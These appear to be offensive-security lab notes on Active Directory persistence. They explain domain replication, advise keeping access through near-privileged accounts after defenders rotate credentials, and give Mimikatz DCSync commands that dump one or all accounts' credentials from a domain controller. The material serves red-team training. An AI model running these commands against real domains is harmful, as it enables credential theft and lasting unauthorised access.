Skip to main content

Credentials

Required Privileges: Administrators - Replicating Directory Changes

Domains are often used in multiple regional locations, and having a single Domain Controller would significantly delay any Authentication services in AD. As such, these Organizations make use of multiple DC's, so it is possible to Authenticate with the same Credentials in two different Locations (This Process is Called Domain Replication).

Each Domain Controller runs a process called the Knowledge Consistency Checker (KCC). The KCC generates a replication topology for the AD Forest and automatically connects to other Domain Controllers through Remote Procedure Calls (RPC) to Synchronize Information. This includes Updated Information such as the User new Password and new Objects such as when a new User is created.

A popular Attack to perform is a DC Sync Attack. If we have access to an Account that has Domain Replication Permissions, we can stage a DC Sync Attack to Harvest Credentials from a DC.


Not All Credentials Are Created Equal

Privileged Credentials

If we only have Privileged Credentials, it is safe to say as soon as the Blue Team discovers us, they will Rotate those Accounts, and we can potentially lose our Access.


  • The goal then is to persist with Near-Privileged Credentials:
    • Credentials that have Local Administrator rights on Several Machines: Usually, organizations have Group's with Local Admin rights on almost all Computers. These Groups are typically divided into one for Workstations and one for Servers.
    • Service Accounts that have Delegation Permissions: With these accounts, we would be able to force Golden and Silver Tickets to perform Kerberos Delegation Attacks.
    • Accounts used for Privileged AD Services: If we compromise Accounts of Privileged Services such as Exchange, Windows Server Update Services (WSUS), or System Center Configuration Manager (SCCM), we could leverage AD Exploitation to once again gain a Privileged Foothold.

DCSync

We can use Mimikatz to Harvest these Credentials. [Domain Administrator Credentials are Required]

:: Performing a DC Sync of a Single Account [Our own for Example]
lsadump::dcsync /domain:za.adobe.loc /user:<Low-Privilege AD Username>


:: Performing a DC Sync of a Every Account 
:: Logging must be Enabled for this Task
log <Username>_dcdump.txt

:: Instead of Specifying the Username the Flag [/all] us Used
:: This Output will go into a File in your Current Directory
lsadump::dcsync /domain:za.adobe.loc /all